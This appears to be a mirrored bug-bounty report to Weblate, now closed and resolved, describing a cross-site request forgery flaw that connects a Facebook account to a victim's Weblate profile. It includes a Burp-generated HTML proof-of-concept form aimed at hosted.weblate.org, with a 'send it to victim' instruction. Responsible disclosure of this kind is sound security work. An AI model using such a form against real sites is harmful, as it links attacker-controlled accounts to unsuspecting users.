Loading HuntDB...

CSRF to Connect third party Account

Medium
W
Weblate
Submitted None
Reported by idiablos

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Hello Weblate Security Team, I have found security vulnerability in your website :[ https://hosted.weblate.org Vulnerable URL :- https://hosted.weblate.org/accounts/profile/#auth Vulnerability :- CSRF to Connect FACEBOOK Account CARF Code :- [save as [name].html and send it to victim <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://hosted.weblate.org/accounts/login/facebook/"> <input type="hidden" name="next" value="&#47;accounts&#47;profile&#47;&#35;auth" /> <input type="submit" value="Submit request" /> </form> </body> </html> Full Youtube Video POC :- https://youtu.be/tIVh8Pa5oWU Expecting to prompt reply :) Regards, Pratik Panchal

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-Site Request Forgery (CSRF)